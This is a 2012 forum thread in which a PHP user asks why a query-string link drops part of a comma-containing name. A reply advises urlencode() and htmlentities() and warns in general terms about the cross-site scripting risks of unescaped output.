December 27th, 2012, 11:00 AM
Help with passing a query string
I want to pass some data using a query string, but have run into a problem.
The line of code is as follows:
<td style="text-align:center; width:5%;"><a href=xxx.php?HouseholdID=<? echo $HouseholdID . '&HouseholdName=' . $HouseholdName; ?> ><img src=pencil.gif border=0</a></td>
The HouseholdName displays correctly in the table column with the full name i.e. Smith, John, but when the query string runs only the value "Smith" is returned instead of the full name Smith, John. Is this because of the comma between the last and first name and is there a way around this?
December 27th, 2012, 11:24 AM
this is the same problem as last time when you inserted raw variables into query strings.
You need to urlencode() every variable before you can safely insert it into a URL. Otherwise you'll end up with a complete mess or even a gigantic security hole.
I hope you at least applied htmlentities() to $HouseholdID etc.? If you didn't, people can insert anything into your page and steal your users' cookies, redirect them to a malware site and whatnot.